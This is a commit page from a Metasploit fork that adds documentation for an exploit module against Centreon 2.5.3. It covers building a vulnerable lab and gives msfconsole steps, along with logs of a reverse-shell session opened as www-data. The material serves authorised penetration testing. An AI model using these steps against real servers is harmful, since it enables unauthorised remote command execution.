adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

centreon useralias first add

Browse Source
This commit is contained in:
h00die
2016-06-11 20:57:18 -04:00
parent 3109bfb8e4
commit bd6eecf7b0
2 changed files with 173 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/centreon_useralias_exec.md
+69
View File
@@ -0,0 +1,69 @@
## Vulnerable Application
[Exploit-db](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz)
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
### Creating A Testing Environment
Creating a testing environment for this application contained many steps, so I figured I would document the process here.
1. Create a fresh install of Ubuntu 16.04. I used a LAMP install.
2. Install php5.6 [askubuntu](http://askubuntu.com/questions/756181/installing-php-5-6-on-xenial-16-04)
3. Enable php5.6 in Apache with ```a2enmod```, disable php7.0 with ```a2dismod```
4. Restart apache with ```apache2ctl restart```
5. Install [Nagios Plugins](https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/quickstart-ubuntu.html) starting at step 6. The plugins link is broken, utilize [nagios-plugins-2.1.1.tar.gz](http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz) instead
6. Install [Centreon Engine](https://documentation.centreon.com/docs/centreon-engine/en/latest/installation/index.html)
7. Install [Centreon Broker](https://documentation.centreon.com/docs/centreon-broker/en/2.11/installation/index.html#using-packages)
8. Install [Centreon clib](https://documentation.centreon.com/docs/centreon-clib/en/latest/installation/index.html)
9. Now install [Centreon Web](https://documentation.centreon.com/docs/centreon/en/2.5.x/installation/from_sources.html)
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/linux/http/centreon_useralias_exec```
4. Do: ```set payload```
5. Do: ```set rhost```
6. Do: ```check```
```
[+] Version Detected: 2.5.3
[*] 192.168.2.85:80 The target appears to be vulnerable.
```
7. Do: ```run```
8. You should get a shell.
```
[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Sending malicious login
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
whoami
www-data
uname -a
Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
```
## Scenarios
Just a standard run.
```
msf > use exploit/linux/http/centreon_useralias_exec
msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
rhost => 192.168.2.85
msf exploit(centreon_useralias_exec) > set verbose true
verbose => true
msf exploit(centreon_useralias_exec) > check
[+] Version Detected: 2.5.3
[*] 192.168.2.85:80 The target appears to be vulnerable.
msf exploit(centreon_useralias_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Sending malicious login
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
whoami
www-data
uname -a
Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
```